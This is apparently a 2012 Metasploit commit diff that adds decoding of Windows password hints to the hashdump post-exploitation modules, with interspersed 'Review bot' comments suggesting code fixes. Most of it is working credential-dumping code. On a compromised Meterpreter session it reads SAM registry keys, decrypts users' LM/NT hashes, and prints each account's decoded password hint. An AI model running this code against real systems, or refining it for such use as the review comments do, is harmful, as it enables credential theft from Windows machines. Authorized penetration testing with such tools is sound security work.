Adding Windows User Password Hint Decoding to Hashdump Tools

* UserPasswordHint, a key that is used to store the user's password
hint, can be easily decoded to clear text to get the user's hint
(Example: "My Favorite Color")
* Added decode_windows_hint() method to perform the decode process
* Added decoded hint output for hashdump.rb and smart_hashdump.rb
unstable
Jonathan Claudius 2012-08-19 23:04:11 -05:00
parent f46545db58
commit fbc36b57d0
3 changed files with 73 additions and 4 deletions


@ -87,6 +87,12 @@ class Metasploit3 < Msf::Post
:pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0], :pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
:type => "smb_hash" :type => "smb_hash"
) )
#If we have a hint, decode and add to the hashstring
if !users[rid][:UserPasswordHint].nil?
hashstring += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
end
print_line hashstring print_line hashstring
end end
print_line() print_line()
@ -164,6 +170,13 @@ class Metasploit3 < Msf::Post
users[usr.to_i(16)] ||={} users[usr.to_i(16)] ||={}
users[usr.to_i(16)][:F] = uk.query_value("F").data users[usr.to_i(16)][:F] = uk.query_value("F").data
users[usr.to_i(16)][:V] = uk.query_value("V").data users[usr.to_i(16)][:V] = uk.query_value("V").data
begin
users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
rescue ::Rex::Post::Meterpreter::RequestError
users[usr.to_i(16)][:UserPasswordHint] = nil
end
uk.close uk.close
end end
ok.close ok.close
@ -205,6 +218,15 @@ class Metasploit3 < Msf::Post
users users
end end
def decode_windows_hint(e_string)
d_string = ""
e_string.scan(/..../).each do |chunk|
bytes = chunk.scan(/../)
d_string += (bytes[1] + bytes[0]).to_s.hex.chr
end
d_string
end
def convert_des_56_to_64(kstr) def convert_des_56_to_64(kstr)
key = [] key = []
str = kstr.unpack("C*") str = kstr.unpack("C*")
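Review bot: `decode_windows_hint` calls `Integer#chr` with no encoding argument, so any UTF-16 code unit above 0xFF (a hint containing non-Latin-1 text) raises RangeError and aborts the whole dump, and an incomplete trailing chunk is silently dropped by `scan(/..../)`; the identical copies of the method in the other two files share this. The callers already hold the raw UTF-16LE bytes and hex-encode them only so this method can undo it, and decoding the bytes as text is both shorter and correct: `[e_string].pack("H*").force_encoding("UTF-16LE").encode("UTF-8", invalid: :replace, undef: :replace)` (needs Ruby 1.9+ `String#encode`). The `.to_s` on `(bytes[1] + bytes[0])` is a no-op on a String either way. The guards `if !users[rid][:UserPasswordHint].nil?` here and in the other two files read more naturally as `unless users[rid][:UserPasswordHint].nil?`. Note that the `begin`/`rescue` added around the registry read covers only that read, so a decode failure is not caught by it.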


@ -140,6 +140,13 @@ class Metasploit3 < Msf::Post
users[usr.to_i(16)] ||={} users[usr.to_i(16)] ||={}
users[usr.to_i(16)][:F] = uk.query_value("F").data users[usr.to_i(16)][:F] = uk.query_value("F").data
users[usr.to_i(16)][:V] = uk.query_value("V").data users[usr.to_i(16)][:V] = uk.query_value("V").data
begin
users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
rescue ::Rex::Post::Meterpreter::RequestError
users[usr.to_i(16)][:UserPasswordHint] = nil
end
uk.close uk.close
end end
ok.close ok.close
@ -183,6 +190,16 @@ class Metasploit3 < Msf::Post
end end
#------------------------------------------------------------------------------- #-------------------------------------------------------------------------------
def decode_windows_hint(e_string)
d_string = ""
e_string.scan(/..../).each do |chunk|
bytes = chunk.scan(/../)
d_string += (bytes[1] + bytes[0]).to_s.hex.chr
end
d_string
end
#-------------------------------------------------------------------------------
def convert_des_56_to_64(kstr) def convert_des_56_to_64(kstr)
key = [] key = []
str = kstr.unpack("C*") str = kstr.unpack("C*")
@ -279,7 +296,14 @@ class Metasploit3 < Msf::Post
# next if guest account or support account # next if guest account or support account
next if rid == 501 or rid == 1001 next if rid == 501 or rid == 1001
collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::\n" collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::\n"
print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::")
#If we have a hint, decode and populate hint_string
hint_string = ""
if !users[rid][:UserPasswordHint].nil?
hint_string += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
end
print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::#{hint_string}")
session.framework.db.report_auth_info( session.framework.db.report_auth_info(
:host => host, :host => host,
:port => @smb_port, :port => @smb_port,
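Review bot: `hint_string` is built with an empty-string initialiser followed by a conditional `+=`, where one expression states the intent more directly: `hint_string = users[rid][:UserPasswordHint].nil? ? "" : " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"`. The hint is appended only to the `print_good` line and not to `collected_hashes`, which presumably keeps the plain pwdump line for later use; that is the right split, and a comment such as `# hint is for the operator's eyes only; collected_hashes keeps the plain pwdump line` would keep a later edit from moving it into the stored string. The enclosing loop starts before this hunk.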


@ -101,6 +101,13 @@ def capture_user_keys
users[usr.to_i(16)] ||={} users[usr.to_i(16)] ||={}
users[usr.to_i(16)][:F] = uk.query_value("F").data users[usr.to_i(16)][:F] = uk.query_value("F").data
users[usr.to_i(16)][:V] = uk.query_value("V").data users[usr.to_i(16)][:V] = uk.query_value("V").data
begin
users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
rescue ::Rex::Post::Meterpreter::RequestError
users[usr.to_i(16)][:UserPasswordHint] = nil
end
uk.close uk.close
end end
ok.close ok.close
@ -142,6 +149,15 @@ def decrypt_user_keys(hbootkey, users)
users users
end end
def decode_windows_hint(e_string)
d_string = ""
e_string.scan(/..../).each do |chunk|
bytes = chunk.scan(/../)
d_string += (bytes[1] + bytes[0]).to_s.hex.chr
end
d_string
end
def convert_des_56_to_64(kstr) def convert_des_56_to_64(kstr)
key = [] key = []
str = kstr.unpack("C*") str = kstr.unpack("C*")
@ -239,7 +255,14 @@ if client.platform =~ /win32|win64/
:pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0], :pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
:type => "smb_hash" :type => "smb_hash"
) )
#If we have a hint, decode and add to the hashstring
if !users[rid][:UserPasswordHint].nil?
hashstring += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
end
print_line hashstring print_line hashstring
end end
print_line() print_line()
print_line() print_line()